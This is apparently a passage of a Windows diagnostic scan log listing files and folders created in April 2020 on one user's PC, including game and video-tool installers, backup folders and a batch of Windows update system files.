2020-04-29 18:53 - 2020-04-29 18:53 - 001573568 _____ C:\Users\Javi\Downloads\SteamSetup.exe
2020-04-29 16:53 - 2020-05-02 14:18 - 000000000 ____D C:\Users\Public\Documents\FX Interactive
2020-04-29 10:05 - 2020-05-02 14:18 - 000000000 ____D C:\Program Files (x86)\Runaway
2020-04-29 10:05 - 2020-04-29 10:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Runaway
2020-04-29 10:05 - 2020-04-29 10:05 - 000000000 ____D C:\Program Files (x86)\FX Uninstall Information
2020-04-29 10:00 - 2020-04-29 10:00 - 000000040 _____ C:\WINDOWS\RUNAWAY.INI
2020-04-28 15:24 - 2020-04-28 15:24 - 000000814 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FX Store.lnk
2020-04-28 15:23 - 2020-04-28 15:25 - 000000000 ____D C:\ProgramData\FXWebPlayer
2020-04-28 15:20 - 2020-04-28 15:23 - 000000000 ____D C:\Program Files (x86)\FX Store
2020-04-28 13:53 - 2020-04-28 15:02 - 233243512 _____ (FX Interactive, SL. ) C:\Users\Javi\Downloads\Instalador_FX_Store.exe
2020-04-27 19:10 - 2020-04-27 19:10 - 000000000 ____D C:\Users\Javi\Documents\COPIA DE HISTORIAL DE ARCHIVOS DE LENOVO INCOMPLETA EN DISCO DE 500 GB HECHA EL 20200427
2020-04-27 19:09 - 2020-04-27 19:09 - 000000000 ____D C:\Users\Javi\Documents\COPIA DE SEGURIDAD DE LENOVO EN DISCO DE 500GB HECHA EL 20200427
2020-04-27 15:35 - 2020-05-01 11:41 - 000000000 ____D C:\Users\Javi\AppData\Roaming\HandBrake
2020-04-26 21:21 - 2020-04-26 21:21 - 000000872 _____ C:\Users\Javi\Desktop\HandBrake.lnk
2020-04-26 21:21 - 2020-04-26 21:21 - 000000000 ____D C:\Users\Javi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HandBrake
2020-04-26 21:21 - 2020-04-26 21:21 - 000000000 ____D C:\Program Files\HandBrake
2020-04-26 21:11 - 2020-04-26 21:11 - 013537880 _____ C:\Users\Javi\Downloads\HandBrake-1.3.1-x86_64-Win_GUI(1).exe
2020-04-26 15:56 - 2020-04-26 15:56 - 000000000 ____D C:\Users\Javi\Desktop\IMPRESORAS
2020-04-26 15:52 - 2020-05-04 20:14 - 000000000 ____D C:\Users\Javi\Desktop\EDITORES DE FOTOS
2020-04-26 15:47 - 2020-05-04 20:14 - 000000000 ____D C:\Users\Javi\Desktop\RECUPERAR DATOS
2020-04-26 15:42 - 2020-05-08 12:44 - 000000000 ____D C:\Users\Javi\AppData\Roaming\360DesktopLite
2020-04-26 15:42 - 2020-05-04 16:07 - 000000000 ____D C:\Users\Javi\Desktop\EBOOKS
2020-04-26 14:51 - 2020-04-26 14:51 - 000000000 ____D C:\Users\Javi\Documents\PUNTO DE RESTAURACION DEL DISCO C DE LENOVO CREADO EL 20200426
2020-04-26 14:09 - 2020-04-26 14:09 - 000000000 ____D C:\Users\Javi\log
2020-04-26 14:09 - 2020-04-26 14:09 - 000000000 ____D C:\Users\Javi\AppData\Local\Icecream
2020-04-26 14:09 - 2020-04-26 14:09 - 000000000 ____D C:\Users\Javi\AppData\Local\CrashRpt
2020-04-26 14:09 - 2020-04-26 14:09 - 000000000 ____D C:\Users\Javi\.Icecream Screen Recorder
2020-04-26 14:07 - 2020-04-26 14:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xiph.Org
2020-04-26 14:07 - 2020-04-26 14:07 - 000000000 ____D C:\Program Files\Common Files\WebM Project
2020-04-26 14:05 - 2020-04-26 14:05 - 000001195 _____ C:\Users\Public\Desktop\Icecream Screen Recorder.lnk
2020-04-26 14:05 - 2020-04-26 14:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Icecream Screen Recorder
2020-04-26 14:05 - 2020-04-26 14:05 - 000000000 ____D C:\Program Files (x86)\Xiph.Org
2020-04-26 14:05 - 2020-04-26 14:05 - 000000000 ____D C:\Program Files (x86)\Icecream Screen Recorder
2020-04-26 13:20 - 2020-04-26 13:31 - 056733816 _____ (Icecream Apps ) C:\Users\Javi\Downloads\screen_recorder_setup.exe
2020-04-25 20:01 - 2020-05-04 20:14 - 000000000 ___RD C:\Users\Javi\Desktop\EDITORES DE VIDEO
2020-04-25 14:12 - 2020-05-04 12:55 - 000000000 ____D C:\Users\Javi\Documents\Wondershare Filmora 9
2020-04-23 12:27 - 2020-04-23 12:27 - 000012512 _____ C:\Users\Javi\Documents\COMPRAR EN ALIEXPRESS.odt
2020-04-22 11:51 - 2020-04-22 11:51 - 000000000 ____D C:\Users\Javi\Downloads\gafas jedi 40
2020-04-22 11:50 - 2020-04-22 11:50 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\Lenovo
2020-04-22 10:15 - 2020-04-22 10:15 - 000000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_ldiagio_01009.Wdf
2020-04-21 13:12 - 2020-05-07 14:27 - 000000000 ____D C:\Users\Javi\Downloads\Nueva carpeta
2020-04-20 13:02 - 2010-05-26 11:41 - 001907552 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dcsx_43.dll
2020-04-20 13:02 - 2010-05-26 11:41 - 000511328 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_43.dll
2020-04-20 13:02 - 2010-02-04 10:01 - 000024920 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_7.dll
2020-04-20 13:02 - 2010-02-04 10:01 - 000022360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\X3DAudio1_7.dll

2020-04-20 12:46 - 2020-04-20 12:46 - 000000000 ____D C:\Users\Javi\AppData\Local\UnrealEngineLauncher
2020-04-20 12:46 - 2020-04-20 12:46 - 000000000 ____D C:\Users\Javi\AppData\Local\UnrealEngine
2020-04-19 10:32 - 2020-04-19 10:32 - 024255481 _____ C:\Users\Javi\Documents\Lorca descarga.pdf
2020-04-18 20:05 - 2020-04-18 20:05 - 000520651 _____ C:\Users\Javi\Documents\CL@VE PETRA.pdf
2020-04-17 16:25 - 2020-05-03 19:30 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\BitTorrent
2020-04-16 17:04 - 2020-04-16 17:04 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 022636544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 019850240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 019812864 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 018027520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 008013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 007756800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 007017472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 006523048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 005910016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 004611584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 004538880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 004129624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 003512320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 002951832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 002800640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSAT.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 002494744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 002180408 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001870408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001545216 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 001477112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001413840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 001310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001264640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001077064 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 001013000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000983040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowsperformancerecordercontrol.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000835584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkfoldersControl.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000775696 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000768528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000686080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000673464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000665088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000647680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2020-04-16 17:04 - 2020-04-16 17:04 - 000538160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000532480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2020-04-16 17:04 - 2020-04-16 17:04 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpclip.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000444416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000420152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000415760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000381440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000380416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\es.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbadmin.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\iasrad.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFoldersShell.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\srumsvc.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000190048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\logoncli.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iasrad.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.XamlHost.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srumsvc.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.XamlHost.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFolders.exe
2020-04-16 17:04 - 2020-04-16 17:04 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000093712 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsgqec.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\iasacct.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000084280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2020-04-16 17:04 - 2020-04-16 17:04 - 000070144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsgqec.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iasacct.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\srumapi.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srumapi.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\iaspolcy.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000040448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iaspolcy.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ias.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ias.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000021520 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-04-16 17:04 - 2020-04-16 17:04 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-04-16 17:03 - 2020-04-16 17:03 - 014818816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 009930552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 006168064 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 005040640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 004563200 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 003802624 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 003753472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 003742544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 003729408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 003547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 002871608 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 002800128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 002767928 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 002453504 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 002086656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001999960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001945600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001918976 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001835008 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001764336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001757096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-04-16 17:03 - 2020-04-16 17:03 - 001729024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001726264 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001665216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001664896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001656904 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001646048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001603584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001512832 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 001484384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001480192 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocoreworker.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 001427456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001378528 _____ (Microsoft Corporation) C:\WINDOWS\system32\webservices.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001368576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wpc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001368576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001300280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 001261808 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001245184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001243648 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001153024 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowsperformancerecordercontrol.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001136128 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001083904 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001081856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001055376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001011200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 001009152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000993280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000982840 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000974336 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000923136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000915192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
